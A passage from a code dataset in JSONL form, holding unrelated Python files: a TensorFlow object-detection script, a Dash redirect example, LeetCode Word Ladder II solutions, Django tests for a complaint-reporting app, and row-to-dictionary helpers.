zipfile\n\nfrom distutils.version import StrictVersion\nfrom collections import defaultdict\nfrom io import StringIO\n# from matplotlib import pyplot as plt\nfrom PIL import Image\nfrom object_detection.utils import ops as utils_ops\n\nif StrictVersion(tf.__version__) < StrictVersion('1.9.0'):\n raise ImportError('Please upgrade your TensorFlow installation to v1.9.* or later!')\n\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\n\n#HELPERS\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\ndef run_inference_for_single_image(image, graph):\n with graph.as_default():\n with tf.Session() as sess:\n # Get handles to input and output tensors\n ops = tf.get_default_graph().get_operations()\n all_tensor_names = {output.name for op in ops for output in op.outputs}\n tensor_dict = {}\n for key in [\n 'num_detections', 'detection_boxes', 'detection_scores',\n 'detection_classes', 'detection_masks'\n ]:\n tensor_name = key + ':0'\n if tensor_name in all_tensor_names:\n tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(\n tensor_name)\n if 'detection_masks' in tensor_dict:\n # The following processing is only for single image\n detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])\n detection_masks = tf.squeeze(tensor_dict['detection_masks'], [0])\n # Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.\n real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)\n detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])\n detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])\n detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n detection_masks, detection_boxes, image.shape[0], image.shape[1])\n detection_masks_reframed = tf.cast(\n tf.greater(detection_masks_reframed, 0.5), tf.uint8)\n # Follow the convention by adding back the batch dimension\n tensor_dict['detection_masks'] = tf.expand_dims(\n 
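The `predict` view in the app.py record above references an undefined name (`RF_cls`; the model output is bound to `classifier`), and it returns `render_template('index.html', ...)` before any of the Bokeh plotting code runs, so everything from `figure(...)` onward is unreachable. A hedged sketch of just the prediction branch; the 0/1-to-label mapping is an assumption, not something the record states:

import pickle

def predict_loan_status(dataset):
    # Load the pickled classifier and map its 0/1 output to a label.
    model = pickle.load(open("Random_Forest.pkl", "rb"))
    prediction = model.predict(dataset)[0]  # single-row DataFrame in, one label out
    # Assumed encoding: 1 -> approved, 0 -> not approved.
    return "Approved" if prediction == 1 else "Not Approved"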
detection_masks_reframed, 0)\n image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')\n\n # Run inference\n output_dict = sess.run(tensor_dict,\n feed_dict={image_tensor: np.expand_dims(image, 0)})\n\n # all outputs are float32 numpy arrays, so convert types as appropriate\n output_dict['num_detections'] = int(output_dict['num_detections'][0])\n output_dict['detection_classes'] = output_dict[\n 'detection_classes'][0].astype(np.uint8)\n output_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n output_dict['detection_scores'] = output_dict['detection_scores'][0]\n if 'detection_masks' in output_dict:\n output_dict['detection_masks'] = output_dict['detection_masks'][0]\n return output_dict\n\ndef image_list(images, dummy_text, PATH_TO_TEST_IMAGES_DIR):\n\tTEST_IMAGE_PATHS = []\n\tcount = 1\n\twhile count < images:\n\t\tlength = len(str(count))\n\t\tdummy_num = ''\n\t\tif length < 5:\n\t\t\tnum = 5 - length\n\t\t\twhile num != 0:\n\t\t\t\tdummy_num = dummy_num + '0'\n\t\t\t\tnum = num - 1\n\t\tfilename = dummy_text + dummy_num + str(count) + '.jpg'\n\t\t# print(filename)\n\t\tTEST_IMAGE_PATHS.append(os.path.join('datasets/' + PATH_TO_TEST_IMAGES_DIR, filename))\n\t\tcount = count + 1\n\treturn TEST_IMAGE_PATHS\n\n\ndef update_data(output_dict, data, image_path):\n\ttemp = data\n\tbox_ctr = 0;\n\tbox_count = output_dict['num_detections']\n\tif box_count == 0:\n\t \tinfo = (image_path[-11:-4], 0, '', '', '', '', '', '')\n\t \ttemp.append(info) \n\t\n\twhile box_ctr < box_count :\n\t \txmin = output_dict['detection_boxes'][box_ctr][1]\n\t \txmax = output_dict['detection_boxes'][box_ctr][3]\n\t \tymin = output_dict['detection_boxes'][box_ctr][0]\n\t \tymax = output_dict['detection_boxes'][box_ctr][2]\n\t \tobj_class = output_dict['detection_classes'][box_ctr]\n\t \tobj_score = output_dict['detection_scores'][box_ctr]\n\n\t \tif box_ctr == 0:\n\t \t\tinfo = (image_path[-11:-4], box_count, obj_class, obj_score, xmin, xmax, ymin, ymax)\n\t \telse:\n\t \t\tinfo = ('', '', obj_class, obj_score, xmin, xmax, ymin, ymax)\n\n\t \ttemp.append(info)\n\t \tbox_ctr = box_ctr + 1\n\n\treturn temp\n\ndef tensorflow_detection(MODEL_NAME, FROZEN_GRAPH, LABELS, info):\n\n\t# Faster R-CNN Model\n\t# MODEL_NAME = 'faster_rcnn_resnet50_coco_2018_01_28'\n\t\n\t# Path to frozen detection graph. 
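The `image_list` helper in the basic_detection.py record builds its zero-padded file names by counting digits and concatenating '0' characters by hand. A sketch of the same result with a format specifier, keeping the record's `dummy_text` prefix and 1-based counting convention:

import os

def image_list(images, dummy_text, test_dir):
    # '{count:05d}' replaces the manual digit counting and zero padding.
    return [
        os.path.join("datasets", test_dir, f"{dummy_text}{count:05d}.jpg")
        for count in range(1, images)
    ]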
This is the actual model that is used for the object detection.\n\tPATH_TO_FROZEN_GRAPH = os.path.join('parameters', MODEL_NAME, FROZEN_GRAPH)\n\n\t# List of the strings that is used to add correct label for each box.\n\tPATH_TO_LABELS = os.path.join('parameters', 'data', LABELS)\n\n\t# LOAD MODEL INTO MEMORY\n\tdetection_graph = tf.Graph()\n\twith detection_graph.as_default():\n\t od_graph_def = tf.GraphDef()\n\t with tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, 'rb') as fid:\n\t serialized_graph = fid.read()\n\t od_graph_def.ParseFromString(serialized_graph)\n\t tf.import_graph_def(od_graph_def, name='')\n\n\t#Label Map\n\tcategory_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)\n\timages = info['images']\n\tdummy_text = info['dummy_text']\n\tdirectory = info['directory']\n\n\tTEST_IMAGE_PATHS = image_list(images, dummy_text, directory)\n\tif not TEST_IMAGE_PATHS:\n\t\treturn pd.DataFrame()\n\n\t# Size, in inches, of the output images.\n\tIMAGE_SIZE = (12, 8)\n\n\tdata = []\n\tcount = 1\n\tfor image_path in TEST_IMAGE_PATHS:\n\t print(\"image\" + str(count) + \" processing\")\n\t print(str(float(100 * count) / images) + \"%\")\n\t image = Image.open(image_path)\n\t # the array based representation of the image will be used later in order to prepare the\n\t # result image with boxes and labels on it.\n\t image_np = load_image_into_numpy_array(image)\n\t # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n\t image_np_expanded = np.expand_dims(image_np, axis=0)\n\t # Actual detection.\n\t output_dict = run_inference_for_single_image(image_np, detection_graph)\n\t \n\t # Visualization of the results of a detection.\n\t # vis_util.visualize_boxes_and_labels_on_image_array(\n\t # image_np,\n\t # output_dict['detection_boxes'],\n\t # output_dict['detection_classes'],\n\t # output_dict['detection_scores'],\n\t # category_index,\n\t # instance_masks=output_dict.get('detection_masks'),\n\t # use_normalized_coordinates=True,\n\t # line_thickness=8)\n\t # plt.figure(figsize=IMAGE_SIZE)\n\t # plt.imshow(image_np)\n\t # print(output_dict)\n\t \n\t data = update_data(output_dict, data, image_path)\n\t count = count + 1\n\t\n\tprint('')\n\tcols = ['Image', 'NumDetected', 'Class', 'Score', 'xmin', 'xmax', 'ymin', 'ymax']\n\tdf = pd.DataFrame(data, columns=cols)\n\treturn df\n\n\n\ndef structured_output(MODEL_NAME, FROZEN_GRAPH, LABELS, image_path):\n\n\tPATH_TO_FROZEN_GRAPH = os.path.join('parameters', MODEL_NAME, FROZEN_GRAPH)\n\tPATH_TO_LABELS = os.path.join('parameters', 'data', LABELS)\n\t\n\tdetection_graph = tf.Graph()\n\twith detection_graph.as_default():\n\t od_graph_def = tf.GraphDef()\n\t with tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, 'rb') as fid:\n\t serialized_graph = fid.read()\n\t od_graph_def.ParseFromString(serialized_graph)\n\t tf.import_graph_def(od_graph_def, name='')\n\n\tcategory_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)\n\n\tIMAGE_SIZE = (12, 8)\n\n\timage = Image.open(image_path)\n\timage_np = load_image_into_numpy_array(image)\n\timage_np_expanded = np.expand_dims(image_np, axis=0)\n\toutput_dict = run_inference_for_single_image(image_np, detection_graph)\n\n\td = {}\n\tbox_ctr = 0;\n\tbox_count = output_dict['num_detections']\n\tif box_count == 0:\n\t \treturn {}\n\t\n\tcurr_class = int(output_dict['detection_classes'][box_ctr])\n\tclass_num = 0\n\twhile box_ctr < box_count :\n\t\tobj_score = output_dict['detection_scores'][box_ctr]\n\t\txmin = 
output_dict['detection_boxes'][box_ctr][1]\n\t\txmax = output_dict['detection_boxes'][box_ctr][3]\n\t\tymin = output_dict['detection_boxes'][box_ctr][0]\n\t\tymax = output_dict['detection_boxes'][box_ctr][2]\n\t\tobj_class = output_dict['detection_classes'][box_ctr]\n\n\t\tif int(curr_class) != int(obj_class):\n\t\t\tcurr_class = int(obj_class)\n\t\t\tclass_num = 1\n\t\telse:\n\t\t\tclass_num = class_num + 1\n\n\t\tobj = {'P-Score': obj_score, 'box': {'xmin': xmin, 'xmax': xmax, 'ymin': ymin, 'ymax': ymax}}\n\t\tname = 'obj-' + str(curr_class) + '.0' '-' + str(class_num)\n\t\tdd = {name: obj}\n\n\t\tclass_name = str(curr_class) + '.0'\n\t\tif curr_class not in d:\n\t\t\td[class_name] = dd\n\t\telse:\n\t\t\td[class_name].update(dd)\n\t\tbox_ctr = box_ctr + 1\n\n\treturn d\n\n\n\n","sub_path":"basic_detection.py","file_name":"basic_detection.py","file_ext":"py","file_size_in_byte":8928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"15670381","text":"import autolink\nimport dash\nimport dash_html_components as html\n\napp = dash.Dash('')\n\napp.scripts.config.serve_locally = True\n\napp.layout = html.Div([\n autolink.Redirect(\n \"I will auto change location path\",\n id='input',\n href='',\n refresh=True\n ),\n html.Button(\"go to google\",id=\"click_me_to_go\")\n])\n\n@app.callback(\n\tdash.dependencies.Output('input', 'href'),\n\t[dash.dependencies.Input('click_me_to_go', 'n_clicks')])\ndef display_output(value):\n return \"www.google.com\"\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","sub_path":"usage.py","file_name":"usage.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"625135885","text":"\"\"\"\nGiven two words (beginWord and endWord), and a dictionary's word list, find all shortest transformation sequence(s) from beginWord to endWord, such that:\n\nOnly one letter can be changed at a time\nEach transformed word must exist in the word list. Note that beginWord is not a transformed word.\nFor example,\n\nGiven:\nbeginWord = \"hit\"\nendWord = \"cog\"\nwordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]\nReturn\n [\n [\"hit\",\"hot\",\"dot\",\"dog\",\"cog\"],\n [\"hit\",\"hot\",\"lot\",\"log\",\"cog\"]\n ]\nNote:\nReturn an empty list if there is no such transformation sequence.\nAll words have the same length.\nAll words contain only lowercase alphabetic characters.\nYou may assume no duplicates in the word list.\nYou may assume beginWord and endWord are non-empty and are not the same.\nUPDATE (2017/1/20):\nThe wordList parameter had been changed to a list of strings (instead of a set of strings). 
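`run_inference_for_single_image` in the record above returns plain numpy arrays (`detection_boxes`, `detection_classes`, `detection_scores`), which the record then walks row by row. A small self-contained sketch of thresholding such an output dict by score before building rows; the helper name is made up here and the snippet is independent of TensorFlow:

import numpy as np

def keep_confident(output_dict, min_score=0.5):
    # Keep only detections whose confidence clears the threshold.
    scores = np.asarray(output_dict["detection_scores"])
    mask = scores >= min_score
    return {
        "num_detections": int(mask.sum()),
        "detection_boxes": np.asarray(output_dict["detection_boxes"])[mask],
        "detection_classes": np.asarray(output_dict["detection_classes"])[mask],
        "detection_scores": scores[mask],
    }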
Please reload the code definition to get the latest changes.\n\"\"\"\n\"\"\"\n而对于这道加强版来说,还需要输出所有符合最短长度的变换的路径,这道题的时间要求非常BT。。所以基本的解题思想是“\n\n1、首先和127的方式一样,使用BFS遍历,不过这次的主要目的是记录出每个单词的最短变换长度(高度),即从start开始变换多少步可以到达 \n2、使用dfs的方式,从endword开始,根据1得到的高度按照深度优先的方式进行路径查找,当找到startword后加入一条路径(注意dfs方法里\n的beginword endword和原题的相反,答案也要做翻转)\n\n\n\"\"\"\n\nfrom string import ascii_lowercase\nfrom collections import defaultdict\nclass Solution:\n def findLadders(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: List[str]\n :rtype: List[List[str]]\n \"\"\"\n visited = defaultdict(set)\n q = [beginWord]\n wordList = set(wordList)\n level = 1\n while len(q) > 0:\n newQ = []\n if endWord in q:\n break\n level_map = defaultdict(set) \n for cur in q:\n for i in range(len(cur)):\n for c in ascii_lowercase: \n newW = cur[:i] + c + cur[i + 1:] \n if newW == cur:\n continue\n if newW not in wordList or newW in visited:\n continue\n if newW not in level_map:\n newQ.append(newW)\n level_map[newW].add(cur)\n visited.update(level_map)\n q = newQ\n paths = [] \n def dfs(word, path):\n if word == beginWord:\n paths.append(path[::-1])\n else:\n for parent in visited[word]:\n path.append(parent)\n dfs(parent, path)\n path.pop()\n dfs(endWord, [endWord])\n return paths\n\n\n\n\n\nfrom collections import deque\nfrom string import ascii_lowercase\nimport sets\nclass Node(object):\n def __init__(self, word):\n self.word = word\n self.parents = []\nclass Solution(object):\n def findLadders(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: List[str]\n :rtype: List[List[str]]\n \"\"\"\n wordList.append(beginWord)\n wordList = set(wordList)\n q, visitedMap, level = [], {}, 0\n q.append(beginWord)\n visitedMap[beginWord] = Node(beginWord)\n while len(q) > 0 :\n size = len(q)\n level += 1\n # print level, map(lambda a: a.word, q)\n if endWord in q:\n break\n new_q = []\n for word in q:\n node = visitedMap[word] \n for i in range(len(word)):\n for c in ascii_lowercase:\n #same word\n if c == word[i]:\n continue\n newWord = word[:i] + c + word[i+1:]\n if newWord not in wordList:\n continue \n if newWord not in visitedMap:\n visitedMap[newWord] = Node(newWord)\n new_q.append(newWord)\n if newWord in new_q:\n visitedMap[newWord].parents.append(node)\n q = new_q\n if endWord not in visitedMap:\n return []\n stk, array, res = [], [\"\" for _ in range(level)], []\n stk.append((visitedMap[endWord], 0))\n # print level, map(lambda word: (word, map(lambda a: a.word, visitedMap[word].parents)), visitedMap.keys())\n while len(stk) > 0:\n node, height = stk.pop()\n # print node.word, height, map(lambda a: a.word, node.parents)\n array[height] = node.word\n if height == level - 1 and node.word == beginWord:\n res.append(array[::-1])\n for parent in node.parents:\n stk.append((parent, height + 1))\n return res\n \n \nimport sets\nfrom collections import deque\nfrom string import ascii_lowercase\nclass DAGNode(object):\n def __init__(self, word):\n self.word = word\n self.parents = []\n\nclass Solution(object):\n def findLadders(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: List[str]\n :rtype: List[List[str]]\n \"\"\"\n wordSet = set(wordList)\n s, m, q = set(), {}, deque()\n m[beginWord] = DAGNode(beginWord)\n q.append(m[beginWord])\n while len(q) > 0:\n m = {}\n size = len(q)\n for i in range(size):\n node = q.popleft()\n word = node.word\n for i in range(len(word)):\n for c in 
ascii_lowercase:\n new_word = word[:i] + c + word[i + 1:]\n if new_word not in wordSet:\n continue\n if new_word in s:\n continue\n if new_word not in m: \n m[new_word] = DAGNode(new_word)\n q.append(m[new_word])\n m[new_word].parents.append(node)\n for word, node in m.items():\n s.add(word)\n if endWord in m:\n break\n path, res = [], []\n def walk(node):\n path.append(node.word)\n if node.word == beginWord:\n res.append(path[::-1])\n for pNode in node.parents:\n walk(pNode)\n path.pop()\n if endWord in m:\n walk(m[endWord])\n return res\n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"interview/others/hard/LC126. Word Ladder II.py","file_name":"LC126. Word Ladder II.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126005218","text":"from django.contrib.auth.models import User\nfrom django.test import TestCase, RequestFactory\nfrom django.urls import resolve\nfrom django.core.management import call_command\n\nfrom apps.core_app.vars import TODAY\nfrom apps.complaint.models import Complaint, TypeComplaint\n# class Views\nfrom .views import (\n ComplaintView,\n ComplaintPublicationView,\n)\nfrom .views import (\n complaint_view,\n complaint_publication_view,\n personal_complaint_view,\n police_complaint_view,\n complaint_that_follow_view)\n\n\nclass ComplaintModelTest(TestCase):\n\n def test_saving_and_retrieving_complaints(self):\n registered = 0\n first_complaint = Complaint.objects.create(\n complainant_name=\"Andres Gutierrez\",\n place_event=\"Mayor rocha ayacucho\",\n event_date='2018-05-31',\n event_time='00:00',\n description='urto de licencia de parte de policias de transito')\n registered += 1\n\n second_complaint = Complaint.objects.create(\n complainant_name=\"Alvaro Gutierrez\",\n place_event=\"Mexico ayacucho\",\n event_date='2018-05-29',\n event_time='09:00',\n description='urto de licencia de parte de policias de transito',\n license_plate='AVE-001')\n registered += 1\n\n self.assertEqual(registered,\n Complaint.objects.all().count())\n\n self.assertEqual(first_complaint,\n Complaint.objects.get(id=first_complaint.id))\n\n self.assertEqual(second_complaint,\n Complaint.objects.get(id=second_complaint.id))\n\n\nclass ComplaintViewTest(TestCase):\n\n def test_complaint_url_resolve_to_form_complaint(self):\n found = resolve('/complaint')\n self.assertEqual(found.func, complaint_view)\n\n def test_uses_complaint_template(self):\n response = self.client.get('/complaint')\n self.assertTemplateUsed(response, ComplaintView.template_name)\n\n def test_register_with_POST_request(self):\n self.generate_type_complaint()\n registered = 0\n self.assertEqual(registered, Complaint.objects.all().count())\n data = {\n 'complainant_name': 'Test name',\n 'place_event': 'Test plave event',\n 'event_date': TODAY.strftime('%d/%m/%Y'),\n 'event_time': '12:00',\n 'description': 'test description bla bla bla bla',\n 'license_plate': 'ASDS123'\n }\n self.client.post('/complaint', data)\n registered += 1\n self.assertEqual(registered, Complaint.objects.all().count())\n\n def generate_type_complaint(self):\n type_registered = 0\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Transito',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n TypeComplaint.objects.create(\n type='Personal',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n 
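All three solutions in the Word Ladder II record implement the two-phase idea its Chinese header describes: a BFS that records, level by level, which words each word was reached from (its "height" and parents), then a DFS from endWord back to beginWord that reverses each completed path. The second and third variants also `import sets`, a module that no longer exists in Python 3. A compact Python 3 sketch of the same scheme:

from collections import defaultdict
from string import ascii_lowercase

def find_ladders(begin_word, end_word, word_list):
    words = set(word_list)
    parents = defaultdict(set)        # word -> words it was reached from
    level, seen = {begin_word}, {begin_word}
    while level and end_word not in level:
        next_level = defaultdict(set)
        for word in level:
            for i in range(len(word)):
                for c in ascii_lowercase:
                    cand = word[:i] + c + word[i + 1:]
                    if cand in words and cand not in seen:
                        next_level[cand].add(word)
        seen |= set(next_level)
        parents.update(next_level)
        level = set(next_level)
    paths = []
    def backtrack(word, path):
        # Walk parent links from end_word back to begin_word.
        if word == begin_word:
            paths.append(path[::-1])
            return
        for parent in parents[word]:
            backtrack(parent, path + [parent])
    if end_word in level:
        backtrack(end_word, [end_word])
    return paths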
TypeComplaint.objects.create(\n type='Policial',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n\n\nclass PublicationComplaintsView(TestCase):\n\n def setUp(self):\n self.complaint: Complaint\n self.user: User\n self.factory = RequestFactory()\n self.url = '/complaint/publications'\n\n def test_url_resolve_publications_complaints(self):\n found = resolve('/complaint/publications')\n self.assertEqual(found.func, complaint_publication_view)\n\n def test_uses_publications_complaints_template(self):\n response = self.client.get('/complaint/publications')\n self.assertTemplateUsed(response, ComplaintPublicationView.template_name)\n\n def test_follow_one_complaint(self):\n complaints_registered = 0\n self.number_complaints_test(complaints_registered)\n self.add_complaints(complaints_registered)\n\n self.user = self.create_user()\n self.client.force_login(self.user)\n\n response = self.client.post(self.url,\n {'add_follower': True, 'complaint_id': self.complaint.id},\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n self.assertEqual(response.status_code, 200)\n\n self.complaint = Complaint.objects.get(id=self.complaint.id)\n self.assertEqual(self.complaint.followers, 1)\n\n def number_complaints_test(self, complaints_registered):\n self.assertEqual(complaints_registered, Complaint.objects.all().count())\n\n def add_complaints(self, complaints_registered, iterate=1):\n for i in range(iterate):\n self.complaint = self.create_complaint()\n complaints_registered += 1\n self.assertEqual(complaints_registered, Complaint.objects.all().count())\n\n def create_user(self) -> User:\n return User.objects.create(username='admin', password='admin123')\n\n def create_complaint(self) -> Complaint:\n return Complaint.objects.create(\n complainant_name=\"Alvaro Gutierrez\",\n place_event=\"Mexico ayacucho\",\n event_date='2018-05-29',\n event_time='09:00',\n description='urto de licencia de parte de policias de transito',\n license_plate='AVE-001')\n\n\nclass PersonalComplaintTest(TestCase):\n\n def test_personal_complaint_url(self):\n found = resolve('/personal_complaint')\n self.assertEqual(found.func, personal_complaint_view)\n\n def test_register_with_POST_request(self):\n call_command('flush', '--no-input')\n self.generate_type_complaint()\n registered = 0\n self.assertEqual(registered, Complaint.objects.all().count())\n data = {\n 'complainant_name': 'Test name',\n 'place_event': 'Test plave event',\n 'event_date': TODAY.strftime('%d/%m/%Y'),\n 'event_time': '12:00',\n 'description': 'test description bla bla bla bla',\n }\n self.client.post('/personal_complaint', data)\n registered += 1\n self.assertEqual(registered, Complaint.objects.all().count())\n\n def generate_type_complaint(self):\n type_registered = 0\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Transito',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n TypeComplaint.objects.create(\n type='Personal',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Policial',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n\n\nclass PoliceComplaintTest(TestCase):\n\n def test_police_complaint_url(self):\n found = resolve('/police_complaint')\n self.assertEqual(found.func, police_complaint_view)\n\n def 
test_register_with_POST_request(self):\n call_command('flush', '--no-input')\n self.generate_type_complaint()\n registered = 0\n self.assertEqual(registered, Complaint.objects.all().count())\n data = {\n 'complainant_name': 'Test name',\n 'place_event': 'Test plave event',\n 'event_date': TODAY.strftime('%d/%m/%Y'),\n 'event_time': '12:00',\n 'description': 'test description bla bla bla bla',\n }\n self.client.post('/police_complaint', data)\n registered += 1\n self.assertEqual(registered, Complaint.objects.all().count())\n\n def generate_type_complaint(self):\n type_registered = 0\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Transito',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n TypeComplaint.objects.create(\n type='Personal',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n TypeComplaint.objects.create(\n type='Policial',\n state=TypeComplaint.ENABLED\n )\n type_registered += 1\n self.assertEqual(type_registered, TypeComplaint.objects.all().count())\n\n\nclass ComplaintThatFollow(TestCase):\n\n def setUp(self):\n self.complaints: [Complaint]\n self.user: User\n self.factory = RequestFactory()\n\n def test_url_resolve(self):\n call_command('flush', '--no-input')\n self.user = self.create_user()\n self.client.force_login(self.user)\n found = resolve(f'/follow_complaints')\n self.assertEqual(found.func, complaint_that_follow_view)\n\n def test_get_response(self):\n call_command('flush', '--no-input')\n complaints_in_database = 0\n news_complaints = 4\n self.follow_complaints(complaints_in_database, news_complaints)\n self.client.force_login(self.user)\n response = self.client.get(f'/follow_complaints')\n self.assertEqual(len(response.context['complaints']), news_complaints)\n\n def follow_complaints(self, complaints_in_database, news_complaints):\n self.user = self.create_user()\n self.add_complaints(complaints_in_database, news_complaints)\n for complaint in Complaint.objects.all():\n ComplaintPublicationView().start_follow(self.user, complaint.id)\n\n\n def add_complaints(self, complaints_registered, iterate=1):\n for i in range(iterate):\n self.complaint = self.create_complaint()\n complaints_registered += 1\n self.assertEqual(complaints_registered, Complaint.objects.all().count())\n\n def create_user(self) -> User:\n return User.objects.create(username='admin', password='admin123')\n\n def create_complaint(self) -> Complaint:\n return Complaint.objects.create(\n complainant_name=\"Alvaro Gutierrez\",\n place_event=\"Mexico ayacucho\",\n event_date='2018-05-29',\n event_time='09:00',\n description='urto de licencia de parte de policias de transito',\n license_plate='AVE-001')\n\n","sub_path":"apps/complaint/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":10530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"651951899","text":"def user_dict(userInfo):\n # user_id, first_name, last_name, email, phone\n user = {}\n user[\"user_id\"] = userInfo[0]\n user[\"first_name\"] = userInfo[1]\n user[\"last_name\"] = userInfo[2]\n user[\"email\"] = userInfo[3]\n user[\"phone\"] = userInfo[4]\n return user\n\n\ndef credential_dict(userCredential):\n # username, password, user_id\n credential = {}\n credential[\"username\"] = userCredential[0]\n credential[\"password\"] = userCredential[1]\n credential[\"user_id\"] = userCredential[2]\n return credential\n\n\ndef 
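`generate_type_complaint` is copy-pasted into three of the test classes in the tests.py record above. A hedged sketch of hoisting that fixture into a shared mixin using Django's `setUpTestData` hook; the model import path matches the record, but the mixin name is made up here:

from django.test import TestCase
from apps.complaint.models import TypeComplaint


class TypeComplaintFixtureMixin:
    """Creates the Transito/Personal/Policial rows the view tests expect."""

    @classmethod
    def setUpTestData(cls):
        super().setUpTestData()  # cooperate with TestCase in the MRO
        for name in ("Transito", "Personal", "Policial"):
            TypeComplaint.objects.create(type=name, state=TypeComplaint.ENABLED)


class ComplaintViewTest(TypeComplaintFixtureMixin, TestCase):
    pass  # test methods can now drop their local generate_type_complaint()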
activity_dict(userActivity):\n # activity_id, user_id, activity_date, activity_time\n activity = {}\n activity[\"activity_id\"] = userActivity[0]\n activity[\"user_id\"] = userActivity[1]\n activity[\"activity_date\"] = userActivity[2]\n return activity\n\n\ndef contactList_dict(userContactList):\n # user_id, contact_id\n contactList = {}\n contactList[\"user_id\"] = userContactList[0]\n contactList[\"contact_id\"] = userContactList[1]\n return contactList\n\n\n# Dict used for demo\ndef contacts_dict(userContact):\n # contact_id, first_name, last_name\n contacts = {}\n contacts[\"user_id\"] = userContact[0]\n contacts[\"username\"] = userContact[1]\n contacts[\"first_name\"] = userContact[2]\n contacts[\"last_name\"] = userContact[3]\n return contacts\n\n\ndef chat_dict(chatInfo):\n # chat_id, chat_name, admin\n chat = {}\n chat[\"chat_id\"] = chatInfo[0]\n chat[\"chat_name\"] = chatInfo[1]\n chat[\"admin\"] = chatInfo[2]\n return chat\n\n\ndef chatUI_dict(chatInfo):\n # chat_id, chat_name, admin\n chat = {}\n chat[\"chat_id\"] = chatInfo[0]\n chat[\"chat_name\"] = chatInfo[1]\n chat[\"admin\"] = chatInfo[2]\n chat[\"first_name\"] = chatInfo[3]\n chat[\"last_name\"] = chatInfo[4]\n return chat\n\n\n# Dict use for demo\ndef post_msg_chat_dict(postChatInfo):\n # chat_id, chat_name, admin\n post_chat = {}\n post_chat[\"post_id\"] = postChatInfo[0]\n post_chat[\"post_msg\"] = postChatInfo[1]\n post_chat[\"user_id\"] = postChatInfo[2]\n post_chat[\"first_name\"] = postChatInfo[3]\n post_chat[\"last_name\"] = postChatInfo[4]\n return post_chat\n\n\n# Dict use for UI\ndef post_msg_chat_dict_UI(postChatInfo):\n # chat_id, chat_name, admin\n post_chat_UI = {}\n post_chat_UI[\"chatId\"] = postChatInfo[0]\n post_chat_UI[\"postId\"] = postChatInfo[1]\n post_chat_UI[\"createdById\"] = postChatInfo[2]\n post_chat_UI[\"username\"] = postChatInfo[3]\n post_chat_UI[\"postMsg\"] = postChatInfo[4]\n post_chat_UI[\"postDate\"] = postChatInfo[5]\n post_chat_UI[\"mediaId\"] = postChatInfo[6]\n post_chat_UI[\"mediaLocation\"] = postChatInfo[7]\n post_chat_UI[\"likes\"] = postChatInfo[8]\n post_chat_UI[\"dislikes\"] = postChatInfo[9]\n return post_chat_UI\n\n\ndef post_msg_chat_dict_UI_2(postChatInfo, replies):\n # chat_id, chat_name, admin\n post_chat_UI = {}\n post_chat_UI[\"chatId\"] = postChatInfo[0]\n post_chat_UI[\"postId\"] = postChatInfo[1]\n post_chat_UI[\"createdById\"] = postChatInfo[2]\n post_chat_UI[\"username\"] = postChatInfo[3]\n post_chat_UI[\"postMsg\"] = postChatInfo[4]\n post_chat_UI[\"postDate\"] = postChatInfo[5]\n post_chat_UI[\"mediaId\"] = postChatInfo[6]\n post_chat_UI[\"mediaLocation\"] = postChatInfo[7]\n post_chat_UI[\"likes\"] = postChatInfo[8]\n post_chat_UI[\"dislikes\"] = postChatInfo[9]\n post_chat_UI[\"replies\"] = replies\n\n return post_chat_UI\n\n\ndef participants_dict(chatParticipant):\n # chat_id, user_id\n participant = {}\n participant[\"chat_id\"] = chatParticipant[0]\n participant[\"user_id\"] = chatParticipant[1]\n return participant\n\n\n# Dict used for demo\ndef chat_participants_dict(chatParticipant):\n # chat_id, 